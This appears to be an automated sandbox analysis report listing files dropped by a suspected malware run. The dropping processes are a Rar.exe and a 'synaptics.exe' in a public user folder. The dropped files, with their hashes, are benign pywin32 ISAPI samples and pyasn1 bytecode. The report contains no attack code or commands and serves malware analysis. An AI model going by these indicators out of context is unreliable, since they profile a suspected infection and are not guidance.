                                                                                                                                                                                      SHA1:5D811D557CA4EC188AA082F591E04E67F8EF9C7F
                                                                                                                                                                                      SHA-256:E3CBDB7EEC55BBBFB01247DA999C44C0FDD2A195EE940102C7D486AA4D8F4A95
                                                                                                                                                                                      SHA-512:D958531DEB0EB2544E9894F3F9903AD586D02EC818DCF10F2A1867427B24BC54000490EBD5CE4C01659F38D3ECF79AB35584DD3578BF8E62BE225DD9918816E5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Installation utilities for Python ISAPI filters and extensions."""..# this code adapted from "Tomcat JK2 ISAPI redirector", part of Apache.# Created July 2004, Mark Hammond..import imp.import os.import shutil.import stat.import sys.import traceback..import pythoncom.import win32api.import winerror.from win32com.client import Dispatch, GetObject.from win32com.client.gencache import EnsureDispatch, EnsureModule.._APP_INPROC = 0._APP_OUTPROC = 1._APP_POOLED = 2._IIS_OBJECT = "IIS://LocalHost/W3SVC"._IIS_SERVER = "IIsWebServer"._IIS_WEBDIR = "IIsWebDirectory"._IIS_WEBVIRTUALDIR = "IIsWebVirtualDir"._IIS_FILTERS = "IIsFilters"._IIS_FILTER = "IIsFilter".._DEFAULT_SERVER_NAME = "Default Web Site"._DEFAULT_HEADERS = "X-Powered-By: Python"._DEFAULT_PROTECTION = _APP_POOLED..# Default is for 'execute' only access - ie, only the extension.# can be used. This can be overridden via your install script.._DEFAULT_ACCESS_EXECUTE = True._DEFAULT_ACCESS_READ = False._DEFAULT_ACCESS_WRITE = False._DE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4114
                                                                                                                                                                                      Entropy (8bit):5.185071284936749
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Nqm1DicrfeDD8kMzF6d0kcxzn2t3Q9sstnc9QRKPpP74s:z2crfEDIxzn2WRRKPNl
                                                                                                                                                                                      MD5:CA18DB7C20AF8050260A221CEEEA7A3B
                                                                                                                                                                                      SHA1:9FC7F2F131C6F48426E9D80146F1721335478498
                                                                                                                                                                                      SHA-256:87876EF7D98051AE7BE5DEEE74A9007423B6C3447509CDE0DB6A1FD8BA1B3385
                                                                                                                                                                                      SHA-512:E7141A1AC5E6E89B96BF11F7460BD2322F2B5FB96282A409D1D56B4DB0D4EA2B43A97EDB39AAFCBEBF808C060BADEEDF5446B7A8E8E09B52E1541E8BF9CAFD40
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Constants needed by ISAPI filters and extensions.""".# ======================================================================.# Copyright 2002-2003 by Blackdog Software Pty Ltd..#.# All Rights Reserved.#.# Permission to use, copy, modify, and distribute this software and.# its documentation for any purpose and without fee is hereby.# granted, provided that the above copyright notice appear in all.# copies and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of.# Blackdog Software not be used in advertising or publicity pertaining to.# distribution of the software without specific, written prior.# permission..#.# BLACKDOG SOFTWARE DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,.# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN.# NO EVENT SHALL BLACKDOG SOFTWARE BE LIABLE FOR ANY SPECIAL, INDIRECT OR.# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESUL
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7877
                                                                                                                                                                                      Entropy (8bit):4.715640535610007
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:eBNSH7SzvwWyrS9knaovBgTxaKqS2eqLFwtxKQUGBzYCvW:eDSH77XrS9kUYnS2eiwiwYWW
                                                                                                                                                                                      MD5:E94564D9A392DCD2D053BEA5B750EDF6
                                                                                                                                                                                      SHA1:C809C32E27BB0FC20FBA0FDBA379CE5E4A0E86C7
                                                                                                                                                                                      SHA-256:244171C764D7E35F0558D3BE46D76223A11B469DD8B0186604059E4F2833C4CB
                                                                                                                                                                                      SHA-512:DE08AA962A1D72F471618EDA9E11CA562F8FCBA3396D17E3DAD32215DC007E373EBDB1380711795AA8A165ED651677D9DD8342C3DF531599B80BE488995417B2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This extension demonstrates some advanced features of the Python ISAPI.# framework..# We demonstrate:.# * Reloading your Python module without shutting down IIS (eg, when your.# .py implementation file changes.).# * Custom command-line handling - both additional options and commands..# * Using a query string - any part of the URL after a '?' is assumed to.# be "variable names" separated by '&' - we will print the values of.# these server variables..# * If the tail portion of the URL is "ReportUnhealthy", IIS will be.# notified we are unhealthy via a HSE_REQ_REPORT_UNHEALTHY request..# Whether this is acted upon depends on if the IIS health-checking.# tools are installed, but you should always see the reason written.# to the Windows event log - see the IIS documentation for more...import os.import stat.import sys..from isapi import isapicon.from isapi.simple import SimpleExtension..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# Notes on reloading.# If yo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4789
                                                                                                                                                                                      Entropy (8bit):4.672778044819042
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:sG5aXbrq9zbjBJxRHugKn7AcOZRcBGOt6ALeQYuAHQQ0i:sGAXbr6DZ99K7AcOZyt6AaYCb
                                                                                                                                                                                      MD5:2EB58F29631C6821D8A299983426CF40
                                                                                                                                                                                      SHA1:9E9013BA1682555FAA42F5DFBD6819D93B547C9A
                                                                                                                                                                                      SHA-256:499C76110B5D506499A3854DA0FB197001515A755838EF9EDD9821E126B04366
                                                                                                                                                                                      SHA-512:3376874BFA3FBD2BE21E5196C46489DCAF53D2EF7C47C1E9305DD399C087E22A75E11DCAD4CDF9DE6345ED4E9427149BE23DFE08802B9F14A3EACDFAB9AEC45D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a sample ISAPI extension written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector.dll" in the current directory. The readme explains this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This is the simplest possible redirector (or proxy) we can write. The.# extension installs with a mask of '*' in the root of the site..# As an added bonus though, we optionally show how, on IIS6 and later, we.# can use HSE_ERQ_EXEC_URL to ignore certain requests - in IIS5 and earlier.# we can only do this with an ISAPI filter - see redirector_with_filter for.# an example. If this sample is run on IIS5 or earlier it simply ignores.# any excludes...import sys..from isapi import isapicon, threaded_extens
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2723
                                                                                                                                                                                      Entropy (8bit):4.8440518325238875
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:r2m9gHV9aeJPLBZMATZhOcxerr3x8AHud1YKGaJxOoE8x6ALLaQYuAHQru5w/Fob:rV9G9zYATZpxerDxRHuwBaJN56ALeQYJ
                                                                                                                                                                                      MD5:87F0CD8E3ECACAB6BC5AE7C8859624A6
                                                                                                                                                                                      SHA1:B1D320A9C99C28534D12AFDD7716A5BE595313CB
                                                                                                                                                                                      SHA-256:6E0ED62598D6806889B4554A85DB9FA63B719AF74F060BEE5AE4C1B99AF44AF4
                                                                                                                                                                                      SHA-512:9528E5DC2B5D1559A3558FCA3F541186F9141B3487E4C7F275CF7451FDFC419DF92087FC3F02BF1DF36A01B7E84BB59292A7069E1C845A51D8940DAEEF0752DF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a sample ISAPI extension written in Python...# This is like the other 'redirector' samples, but uses asnch IO when writing.# back to the client (it does *not* use asynch io talking to the remote.# server!)..import sys.import urllib.error.import urllib.parse.import urllib.request..from isapi import isapicon, threaded_extension..# sys.isapidllhandle will exist when we are loaded by the IIS framework..# In this case we redirect our output to the win32traceutil collector..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# The site we are proxying..proxy = "http://www.python.org"..# We synchronously read chunks of this size then asynchronously write them..CHUNK_SIZE = 8192...# The callback made when IIS completes the asynch write..def io_callback(ecb, fp, cbIO, errcode):. print("IO callback", ecb, fp, cbIO, errcode). chunk = fp.read(CHUNK_SIZE). if chunk:. ecb.WriteClient(chunk, isapicon.HSE_IO_ASYNC). # and wait for the next callback to say thi
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6459
                                                                                                                                                                                      Entropy (8bit):4.718310882378029
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:XGHkDjB5EpC79K4LdaPxZmI+gqehDSmI7b2u4R7AVYCIw:XGEDV5EpChbLdaJKBeYbTYXw
                                                                                                                                                                                      MD5:B4F1ED76C296CB5A03E14CCC292CC9B2
                                                                                                                                                                                      SHA1:9AF425A8903F4F06AAB99A2FF61F33BB1ECFBB4E
                                                                                                                                                                                      SHA-256:F1B8AA33D41182EE3FFAD329A4CA2766B1C9693EE6C80F84E725C40D6E522AEB
                                                                                                                                                                                      SHA-512:D5DF8D63C33E9E9A582218FCF8B229BE5CF0E2BC649B17192B08D6E37FA82A1B57F7455724A6771C1EBD74E5B15DCE99EB94AAEC639EAFBE896776D61CAEB9F1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a sample configuration file for an ISAPI filter and extension.# written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector_with_filter.dll" in the current directory. The readme explains.# this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This sample provides sample redirector:.# It is implemented by a filter and an extension, so that some requests can.# be ignored. Compare with 'redirector_simple' which avoids the filter, but.# is unable to selectively ignore certain requests..# The process is sample uses is:.# * The filter is installed globally, as all filters are..# * A Virtual Directory named "python" is setup. This dir has our ISAPI.# extension as the only application, mapped
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6318
                                                                                                                                                                                      Entropy (8bit):4.566729696244953
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Iskw+JLCJx5KaB9GbV5qdO4U0p8K3aSzYLv4YqQFzCHLkWwUcdQUGBLHQYuAHQ4V:Isk2vBgT0aKqSaRzCHLFwtdQUGBzYC4W
                                                                                                                                                                                      MD5:4898630ADAF813D8B0A23E92C377746A
                                                                                                                                                                                      SHA1:8E5ADFF4FAFCA8CAA6DEEBF9490EB393C8E3EE59
                                                                                                                                                                                      SHA-256:07A0ED251A46D73E2B00A13597F2B69BB7BE6035F88B8172573162407FA6B7CC
                                                                                                                                                                                      SHA-512:D9F1C51F215EF170BC69D1FB6F95ABE76D626266FCAE9AC33AEC23119AB67E0DC6F42E294D22CAD8E29A77B381177AE4092390869AA544A460FBF08C888DD057
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This extension is used mainly for testing purposes - it is not.# designed to be a simple sample, but instead is a hotch-potch of things.# that attempts to exercise the framework...import os.import stat.import sys..from isapi import isapicon.from isapi.simple import SimpleExtension..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# We use the same reload support as 'advanced.py' demonstrates..import threading..import win32con.import win32event.import win32file.import winerror..from isapi import InternalReloadException...# A watcher thread that checks for __file__ changing..# When it detects it, it simply sets "change_detected" to true..class ReloadWatcherThread(threading.Thread):. def __init__(self):. self.change_detected = False. self.filename = __file__. if self.filename.endswith("c") or self.filename.endswith("o"):. self.filename = self.filename[:-1]. self.handle = win32file.FindFirstChangeNotification(. os.path.dir
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2444
                                                                                                                                                                                      Entropy (8bit):4.437690052854761
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:p2C72ZW43m46ZEu/4adcD961wmQhHm46ZXnLVPM66G4YS961NT:p343oEBD+wmEHoXLBaaS+NT
                                                                                                                                                                                      MD5:E63FC55BD3949A33079F97803140971D
                                                                                                                                                                                      SHA1:9D52B4C9062B97F44ECEB5074F6D71117D750844
                                                                                                                                                                                      SHA-256:435FB9AF375154250BA521A2D478D110D1E1A82E0311A6293611065824BED1F0
                                                                                                                                                                                      SHA-512:7A15E6956D5BCA76E2C8C028896F9488E6DAE2A6B5E6B0624B8AD1EB280D9ABEFBA1488C76C74C25A87B710DF52C7AC752DAF34A0F01F7366C9ADE55FDCF1D97
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Simple base-classes for extensions and filters...None of the filter and extension functions are considered 'optional' by the.framework. These base-classes provide simple implementations for the.Initialize and Terminate functions, allowing you to omit them,..It is not necessary to use these base-classes - but if you don't, you.must ensure each of the required methods are implemented.."""...class SimpleExtension:. "Base class for a simple ISAPI extension".. def __init__(self):. pass.. def GetExtensionVersion(self, vi):. """Called by the ISAPI framework to get the extension version.. The default implementation uses the classes docstring to. set the extension description.""". # nod to our reload capability - vi is None when we are reloaded.. if vi is not None:. vi.ExtensionDesc = self.__doc__.. def HttpExtensionProc(self, control_block):. """Called by the ISAPI framework for each extension request... sub-cla
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4374
                                                                                                                                                                                      Entropy (8bit):4.72440993117079
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:aQ6VvLzWLQHuOYl2dIIa4iq3+OYcRQsALeQYuAHQv0i:aQr2bYl2eIa4iqOOYwvAaYCQ
                                                                                                                                                                                      MD5:A1328B4C7E2744F219AAAF7AD410BF95
                                                                                                                                                                                      SHA1:FA9323DDA3ECA819FD2B099D9A27777E4F688186
                                                                                                                                                                                      SHA-256:D9D6724BFCED45609F1D60ADB776DF6B2B56DBDCFBC6B6CB6C0C24F3DA329DB5
                                                                                                                                                                                      SHA-512:5FA4C9AB245580417E1D1610ED8085E387F9EA1247CEB5D138127C5AFF58F033D76137701708752131F3F0032982D813B222F7A6E93481169C9266A176ADF566
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is an ISAPI extension purely for testing purposes. It is NOT.# a 'demo' (even though it may be useful!).#.# Install this extension, then point your browser to:.# "http://localhost/pyisapi_test/test1".# This will execute the method 'test1' below. See below for the list of.# test methods that are acceptable...import urllib.error.import urllib.parse.import urllib.request..# If we have no console (eg, am running from inside IIS), redirect output.# somewhere useful - in this case, the standard win32 trace collector..import win32api.import winerror..from isapi import ExtensionError, isapicon, threaded_extension.from isapi.simple import SimpleFilter..try:. win32api.GetConsoleTitle().except win32api.error:. # No console - redirect. import win32traceutil...# The ISAPI extension - handles requests in our virtual dir, and sends the.# response to the client..class Extension(threaded_extension.ThreadPoolExtension):. "Python ISAPI Tester".. def Dispatch(self, ecb):. pr
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7325
                                                                                                                                                                                      Entropy (8bit):4.496571622826724
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:pIRBkE/cXV6YMNKUxA9yU/tjgcTaFHDZapRVqvk:p0x/YMNxOBVgcTKHDZNk
                                                                                                                                                                                      MD5:C214741870D6B454C367B90334A686DC
                                                                                                                                                                                      SHA1:0C53EA3491F82A1B4FA6196664E7B0463BE6AFFE
                                                                                                                                                                                      SHA-256:C2F3CA495C0C326B3EE07F6337D9FF42AFE2D0CBC5F7E8BADDECFB12392515A0
                                                                                                                                                                                      SHA-512:6CD978D45AB9EF55CBEC09CC40A9DB91F38FF536BEA77EAFE8493486966ECE2FE0E7F7E6084E560DBCC86394A268E31AB68255ADCD7F7F6D859BE95921F5E553
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""An ISAPI extension base class implemented using a thread-pool.""".# $Id$..import sys.import threading.import time.import traceback..from pywintypes import OVERLAPPED.from win32event import INFINITE.from win32file import (. CloseHandle,. CreateIoCompletionPort,. GetQueuedCompletionStatus,. PostQueuedCompletionStatus,.).from win32security import SetThreadToken..import isapi.simple.from isapi import ExtensionError, isapicon..ISAPI_REQUEST = 1.ISAPI_SHUTDOWN = 2...class WorkerThread(threading.Thread):. def __init__(self, extension, io_req_port):. self.running = False. self.io_req_port = io_req_port. self.extension = extension. threading.Thread.__init__(self). # We wait 15 seconds for a thread to terminate, but if it fails to,. # we don't want the process to hang at exit waiting for it.... self.setDaemon(True).. def run(self):. self.running = True. while self.running:. errCode, bytes, key, overlap
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):66
                                                                                                                                                                                      Entropy (8bit):4.608121581184648
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SHWfrSLqgOAbV9N4MLvYnPn:SHWfGLqhAxRYPn
                                                                                                                                                                                      MD5:0AD7C7B33183D588D001BE929EF9761A
                                                                                                                                                                                      SHA1:FFF1F3360360AEA1108F55D3133B8173CED480FB
                                                                                                                                                                                      SHA-256:B5CE16BA552FE1992992656D79EF7E16C81CEA08BD8D9147D5521B02F4968F7B
                                                                                                                                                                                      SHA-512:8B3D1D475C63868471D478DD5FAB10D41CC6B963C612846706836518820D6DFD710B3B50284F4222ED627EBA74E1AF61353FCC17FC67F7993A02C5637602AD9F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# https://www.python.org/dev/peps/pep-0396/.__version__ = '0.6.1'.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                      Entropy (8bit):4.915419392027585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/re7lauletxbkCoJ1tt/lPlmuaHF50YTlHX0M9VWrzL1dM4LkcTgM:y/S78qetGCoJ1rGuaHxEM9Ardnt
                                                                                                                                                                                      MD5:5C3E8841E32AF41E172E94DD3155AC5E
                                                                                                                                                                                      SHA1:EC0A28F64DCD33C1DE34A1C3E998C75AA7611F72
                                                                                                                                                                                      SHA-256:16318E2F44C421B7BA38766D880A4B32CB6ADB5FC7076A87A55302FC26EA86B8
                                                                                                                                                                                      SHA-512:C0DDF6E75B2D7B60DFFCA83C21B410C2CCE42986CD59F3CB8398D73B3BCDBD07FF3F8499F010921D2FD4FA6AB9236B3F08898A4F9EBB07BCEC40ABDBE9F2D0C6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..fB........................@...s....d.Z.d.S.).z.0.6.1N)...__version__..r....r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4123
                                                                                                                                                                                      Entropy (8bit):4.996515302319786
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:if//QELK0E+xQk5QMwJ9v9YitXwqiOEsRuUOGnBiw:ifm0XQ1MwzOOFRTBp
                                                                                                                                                                                      MD5:3DBA8224670CCC04457E0A2B25A8EF1A
                                                                                                                                                                                      SHA1:5AA7A1ACDE99C672ED4A4DED0FC2AC7740C0BBB2
                                                                                                                                                                                      SHA-256:0D3588F04690BCE574A4F78FD7DFFB7DA21EC92DA0E9D648A5CDF4EDDC115131
                                                                                                                                                                                      SHA-512:105A789B93C5EA647D914609F2A4BB561B99D71D325AFD948E2E768126FA74FD593E3C8E9B4E0AA2644B826F9CE6C1B0847239F420D8B3137433F0824BC3F7E1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.e.e.e.e.d...Z.i.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.a.d.d...Z.d.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.S.)......N)...__version__)...error)...Debug..setLogger..hexdump..........i....)...none..encoder..decoder..allc....................@...s&...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.)...PrinterNc....................C...sj...|.d.u.r.t...d...}.|...t.j.....|.d.u.r.t.....}.|.d.u.r t...d...}.|...|.....|...t.j.....|...|.....|.|._.d.S.).N..pyasn1z!%(asctime)s %(name)s: %(message)s)...logging..getLogger..setLevel..DEBUG..StreamHandler..Formatter..setFormatter..addHandler.._Printer__logger)...self..logger..handler..formatter..r.....>C:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\debug.py..__init__ ...s..........................z.Printer.__init__c....................C........|.j...|.....d.S...N).r......debug..r......msgr....r....r......__call__2..........z.Printer.__call__c......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4092
                                                                                                                                                                                      Entropy (8bit):4.987517156615224
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Qce+V9bNxz9XBMXG8oD78Or+3rDWXId4d32NxjbiuipJ:IqZP9GWKOr+3eId632TjbriH
                                                                                                                                                                                      MD5:8C54B066F7AC0D6E2D30C330E8F566F3
                                                                                                                                                                                      SHA1:94E0598F6E4A35D4AD22D14C71011FED3A93B1EB
                                                                                                                                                                                      SHA-256:D8529D263C9FF48975298D4CB436DD55E5A034FB7D4787BFFA95BEA9F9ECA362
                                                                                                                                                                                      SHA-512:ABAEA21E6FE499342E39E7A33FD67B9509ADD56B52100141DD0C7F38B268DCB09E0758BF8553FC783DDBA4675EFBB394D164D9068E3A3BE51844FFBC50E14559
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f.........................@...s....G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.d.S.).c....................@...s$...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.d.S.)...PyAsn1ErroraB...Base pyasn1 exception.. `PyAsn1Error` is the base exception class (based on. :class:`Exception`) that represents all possible ASN.1 related. errors... Parameters. ----------. args:. Opaque positional parameters.. Keyword Args. ------------. kwargs:. Opaque keyword parameters.. c....................O...s....|.|._.|.|._.d.S...N)..._args.._kwargs)...self..args..kwargs..r.....>C:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\error.py..__init__....s........z.PyAsn1Error.__init__c....................C...s....|.j...d.i...S.).a7...Return exception context.. When exception object is created, the caller can supply some opaque. context for the upper layers to better u
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):59
                                                                                                                                                                                      Entropy (8bit):4.089038983548258
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                      MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                      SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                      SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                      SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This file is necessary to make this directory a package..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                      Entropy (8bit):4.646004548174159
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/reLuleh/wZWeiouWDaHF50YTlHX0M9VWrzL1A67kcTgp:y/SLqeh/wxZDaHxEM9ArdA6x4
                                                                                                                                                                                      MD5:D66824B5940B2919BF22AAF9835EF8E1
                                                                                                                                                                                      SHA1:83039C2051016B395DF9D065AEAF6D898DBA3E76
                                                                                                                                                                                      SHA-256:FD396D8A89D4A474447205C948C1A2C432A8532122B8579E60376824A73BC860
                                                                                                                                                                                      SHA-512:51FDEA39CA3847B572782A1F1978FFA7B4A44DBC636CBE31666EC15CBB4CDD4014A6E20CC58AA749805FB1087A32B05D85E9120CA1B1502AB31BE3D2E71F5C61
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......T..f;........................@...s....d.S.).N..r....r....r.....GC:\Users\Public\QExvbmVOb25l\lib\site-packages\pyasn1\codec\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5825
                                                                                                                                                                                      Entropy (8bit):5.2823731361709525
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:N+ZlQBEsXLKBLEQ8yjdQBblCEdS1azu5VZ6qMwxqNo+dTqVSM5LleeVOpRfYyU6W:IxrZ+jCr1azunZNMLoeTsH5LlL6RfYTv
                                                                                                                                                                                      MD5:6EC024F438F1ECC63BA35DEDF0BADF99
                                                                                                                                                                                      SHA1:3F53FA8BAF5B44F90865850DE800F1A226CC2576
                                                                                                                                                                                      SHA-256:0F80FEA6E328EF679A7600C03332D0AE88A7A52297537E0F2C35E1AD342DDB3F
                                                                                                                                                                                      SHA-512:E922DBBFB9A5A517AD13975BFAC72F5C26E8CB5F5E8C2BAC48E202A89ADBE64EAE237B415610BC52C50AD7E23CB18DC047DB425BA712033F50C98866E7FA92D3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
